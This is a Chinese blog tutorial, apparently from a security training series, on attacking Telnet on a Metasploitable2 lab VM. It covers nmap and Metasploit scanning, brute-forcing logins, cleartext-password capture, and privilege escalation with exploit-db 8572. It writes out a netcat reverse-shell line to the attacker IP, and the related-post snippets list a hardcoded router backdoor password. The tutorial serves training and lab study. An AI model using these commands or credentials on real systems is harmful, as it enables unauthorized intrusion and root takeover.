4.6、漏洞利用-Telnet

已于 2024-09-23 11:05:44 修改
阅读量4.9k 收藏 25
点赞数 3
分类专栏: 网络安全训练营 文章标签: 网络安全
于 2022-10-03 09:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwm_20211031_475/article/details/127040691
版权

目录

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

2、telnet版本介绍

3、telnet密码破解

4、telnet登录测试

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

2、Tenet明文密码传输

4.6.3、telnet登录提权

1、msf登录telnet

2、msf连接shell下载exp

3、设置kali nc监听

4、编译执行exp,获取root

 

4.6、漏洞利用-Telnet

4.6.1、telnet暴力破解

1、telnet介绍

Telnet服务,即远程终端协议服务,使用明文传输用户的所有内容,具有安全隐患。Telnet服务默认使用23端口

2、telnet版本介绍

攻击机kali:192.168.12.128

靶机metasploitable2:192.168.12.129

(1)使用nmap获取

nmap 192.168.12.129
nmap -p 23 -sV 192.168.12.129

4f686cdd162462d7af4bd9a53f7c9d32.png3f3dda453f5c452201087b062269264d.png

 

(2)使用metasploit

use auxiliary/scanner/telnet/telnet_version

show options

set rhosts IP

run

成功建立连接后可获得telnet的账号和密码

2d36ea3af02945ac159e7fa025430ca5.png7fa9321f4b89b341ffe3ce690a6ef321.png75af5278fff24a2d1fd67977a565b51d.png

 

 

3、telnet密码破解

search telnet

use auxiliary/scanner/telnet/telnet_login

show options

set rhosts IP
set user_file /路径
set pass_file /路径
//这里直接用msfadmin/msfadmin登录不再演示

run

1ea643824ab715a2bde7750d9f0048c0.png2a1bdb71a10c33d0ee145c8991d723a7.pngc3640d0239f9ada66d94e7b5a9255676.png

 

 

4、telnet登录测试

使用破解好的会话连接telnet,并执行对应的命令

使用sessions -l 列举建立的会话

使用session -i id 使用对应的会话

5118ae2a6385836d6d9c57305f02220e.pngc13d17f798fe3591a0970fd5499e2480.png

 

5、获取meterpreter shell

 

 

4.6.2、telnet认证过程抓包分析

1、Telnet客户端连接telnet服务器

Windows下开启Telnet客户端,连接telnet服务,默认下该服务关闭。

控制面板—>程序和功能—>telnet client

Dos命令框下使用telnet启动客户端,?命令查看帮助。

a203463e374bf0c4c9a7474f6b5fc05f.pngab615b388dbbddd2f046a0a7ddc8bdf5.png7d68341c397ad3f5382d456f9dc7748c.png

 

2、Tenet明文密码传输

Wireshark抓包分析

对比上述登录命令即可明显得出Telnet使用明文传输内容。

3c741ddc8a9fcadadd959bebbef81ff9.png991770690a07be79b249d523a86232f7.png011a0096e71f09b161310751459a542d.png

 

4.6.3、telnet登录提权

登录的目的在于提权,掌握系统root权限,具体流程

登录telnet服务
使用session -i连接bash shell
攻击机准备提权文件
通过bash shell将攻击机上的提权文件下载到靶机上
攻击机开启端口监听
在shell中执行,并定义反弹shell执行地址
连接shell,获得root权限

1、msf登录telnet

832fd65e37393a21071e3b5587f9a0aa.png

 

2、msf连接shell下载exp

攻击机准备提权文件
由于靶机无法直接下载exp,所有必须先将提权文件下载到kali中,修改文件名及后缀,开启kali的http服务,然后从连接的shell中将exp从kali中下载到靶机中。

值得注意的是默认的传输目录是/var/www/html/

另外,下载的exp文件需要在其末尾加入新行,不然后续执行的时候会报no newline的error。

service apache2 start    开启http服务

service apache2 status    查看http状态

cd /var/www/html/    切换到默认传输目录

wget http://www.exploit-db.com/download/8572    使用wget下载exp文件到kali

mv 8572 test.c    修改后缀名

5b4b1d9cd9c179bae68897a0adde77c5.png1eea0264b15f2fe28646d64b125f947f.png

 

msfadmin@metasploitable:~$ wget "http://192.168.12.128/test.c"
通过shell下载exp到靶机

85a18e39afb0c5a5bf628880ee604c16.png

 

 

3、设置kali nc监听

nc -lvp 6666
-l启动监听模式 
-v详细的分析内容
-p指定监听端口

c91919328e7a5375a3e4b07a835f2a03.png

 

4、编译执行exp,获取root

msfadmin@metasploitable:~$ gcc test.c -o exploit    编译C程序

msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run    定义执行环境至/run

msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 192.168.12.128 6666' >> /tmp/run

msfadmin@metasploitable:~$ cat /tmp/run    验证run配置

msfadmin@metasploitable:~$ ps aux | grep udev    查看pid

msfadmin@metasploitable:~$ ./exploit 2747    执行root权限id-1

 执行第一条命令的时候提示在tes.c文件的末尾没有newline,所有要在文件中添加以后再重新下载。

0482c291df9d95f56c60063371c092ee.png

添加空行重新下载后继续。

00db4d6b20962e337c720022c60386c6.png

 

id    权限id

whoami    我是谁

返回监听端口,结果表明提权成功

064ac5e247979750a3d3386a281b1bde.png

 

 

 

 

Apache Flink (最新版本) 远程代码执行
正是修行时
05-04 951
路虽远,行则将至;事虽难,做则必成
内网渗透-Linux内网渗透
lza20001103的博客
08-16 1982
内网渗透-Linux内网渗透
Linux服务器SSH介绍之Telnet明文漏洞
m0_65482680的博客
11-23 761
Telnet的最大安全问题在于其明文传输的方式,这使得它在现代网络环境下极易受到各种网络攻击的威胁。相比之下,SSH通过加密和认证机制提供了更强的安全性,是替代Telnet的推荐方案。因此,为了确保系统和数据的安全,务必避免使用Telnet,转而使用SSH进行远程访问。
6-7漏洞利用-Telnet暴力破解
山兔的博客
07-12 3268
Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。我们本地有台计算机,远程有台服务器,服务器上开启telnet服务,我们可以通过本地的机器连接到telnet服务器,然后执行对应的系统命令,服务器执行完成之后,会将结果返回到本地计算机,中间通过的协议就是telnet协议在终端使用者的电脑上使用telent程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务
telnet‘ 不是内部或外部命令,也不是可运行的程序 或批处理文件
最新发布
m0_53518956的博客
03-20 1301
Telnet(远程登录)是一种用于通过互联网连接到远程计算机的协议。它允许用户在自己的设备上访问并控制另一台计算机,就像直接使用该计算机一样。
Telnet的攻击
uuty的专栏
10-18 3087
所谓对telnet的攻击也不外乎对telnet的用户猜解和对telnet服务进程的溢出,除了这些, 本人觉得telnet并没有太大的问题.telnet的连接并不是大家想象的那么简单了,虽然没有像ssh那样进行加密, 不过, 还是比ftp等通讯来的复杂。   D:>telnet 192.168.25.1 Red Hat Linux release 7.3 (Valhalla) Kernel 2.4.
漏洞利用-Telnet登录提权
guoyuxin3的博客
05-19 1198
msf登录telnet 在metasploit中使用 telnet_login进行登录,并使用sessions -i id 连接shell。 kali中启动metasploit 利用telnet_login模块连接(这里假设知道账号和密码 不知道的话可以爆破) 获得shell msf连接shell下载exp 使用 wget进行下载 wget http://www.exploit-db.com/download/8572 这里先是下载到了kali上 再利用靶机(此...
口令暴力破解--Telnet协议暴力破解、数据库暴力破解与远程桌面暴力破解
薛定谔的猫
04-12 6917
用户可以通过输入用户名和密码来登录数据库服务器。输入如下命令:exec master.dbo.xp_cmdshell 'ipconfig',再输入go,可以发现ipconfig成功执行,获取目标操作系统的ip信息。开启kali-linux虚拟机,打开命令行窗口运行NMAP,输入命令nmap -v -A -Pn 193.168.1.24,对该IP地址进行扫描。在本机打开命令行,输入mysql -h 193.168.1.38 -u root –p,输入密码admin888,尝试登录mysql服务器。
Kali学习 | 漏洞利用4.8 渗透攻击Telnet服务
qq_43233085的博客
01-11 4386
Kali学习 | 漏洞利用4.8 渗透攻击Telnet服务Telnet介绍操作步骤 Telnet介绍 Telnet服务是一种“客户端/服务器”架构,在整个Telnet运行的流程架构中一定包括两个组件,分别是Telnet服务器和Telnet客户端。 由于Telnet是使用明文的方式传输数据的,所以并不安全。 这里就可以使用Metasplolit中的一个模块,可以破解出Telnet服务的用户名和密码...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
修复安全漏洞:Linux系统OpenSSH升级指南
"这篇文档介绍了如何在Linux操作系统,特别是Red Hat Enterprise Linux Server release 5.4 x86_64环境下,对OpenSSH进行安全升级,以修复一个可能被远程攻击者利用的安全漏洞。该漏洞可能导致用户账户信息的泄露。...
telnet-0.17-65.el7_8.x86_64.rpm
08-25
为防止镜像地址难找,官网要么被墙要么下载缓慢。所以将0.17-65.el7_8 版本telnet安装包上传,就当是个备份,方便以后使用。
漏洞讲解:远程开启Telnet
08-20
题目:漏洞讲解<br><br>一.远程开启Telnet<br><br>NTLM身份认证过程是:<br>1、客户端首先在本地加密自己的密码成为密码散列<br>2、客户端向服务器发送自己的帐号,这个帐号是没有经过加密的,明文直接传输<br>3、服务器产生一个16位的随机数字发送给客户端,作为一个 challenge <br>4、客户端再用加密后的密码散列来加密这个 challenge ,然后把这个返回给服务器。作为 response 。<br>5、服务器把用户名、给客户端的challenge 、客户端返回的 response 这三个东西,发送域控制器<br>6、域控制器用这个用户名在 SAM密码管理库中找到这个用户的密码散列,然后使用这个密码散列来加密 challenge。<br>7、域控制器比较两次加密的 challenge ,如果一样,那么认证成功
漏洞挖掘实践
John:网络安全_Qt技术_积累
06-07 2941
完整图片版:http://1.johnhome.sinaapp.com/?p=157 一.目的 1.1掌握缓冲区溢出的原理 缓冲区指程序运行期间,在内存中分配的一个连续的区域,用于保存包括字符数组在内 的各种数据类型。溢出,指所填充的数据超出了原有的缓冲区边界,并非法占据了另一段内存区域。缓冲区溢出,即由于填充数据越界而导致原有流程的改变,攻击者借此精心构造
04 渗透测试基础
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
6-9漏洞利用-Telnet登陆提权
山兔的博客
07-16 629
使用弱口令登录之后,进行提权。
Linux学习之Telnet明文漏洞
qq_42108074的博客
08-19 473
此文章为8月Day 19学习笔记,内容来源于极客时间。里边,鼠标右键点击第一条数据,然后选择。再打开在同一个内网的主机,然后使用。然后就看到了显示界面中的密码。,之后输入用户名和密码,注意。来监控端口,然后把数据传给。,把监听的信息保存到。
ctf:kali2:扫描telnet版本:auxiliary/scanner/telnet/telnet_version
viviliving的专栏
12-09 1542
msf6 >msf6 >Examples:
宏电 H8922 Telnet后门漏洞(CVE-2021-28149)
孤桜懶契
04-06 1928
漏洞描述 i ⭐宏电 H8922 Telnet存在硬编码的账号密码 且默认开放 5188端口连接,可以以Root身份获取权限 漏洞影响 s ✅宏电 H8922 空间测绘 d ⭕ZoomEy:app:"Hongdian H8922 Industrial Router" 漏洞复现 搜索 ✅ Telnet连接目标5188端口,账号密码为 root/superzxmn ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值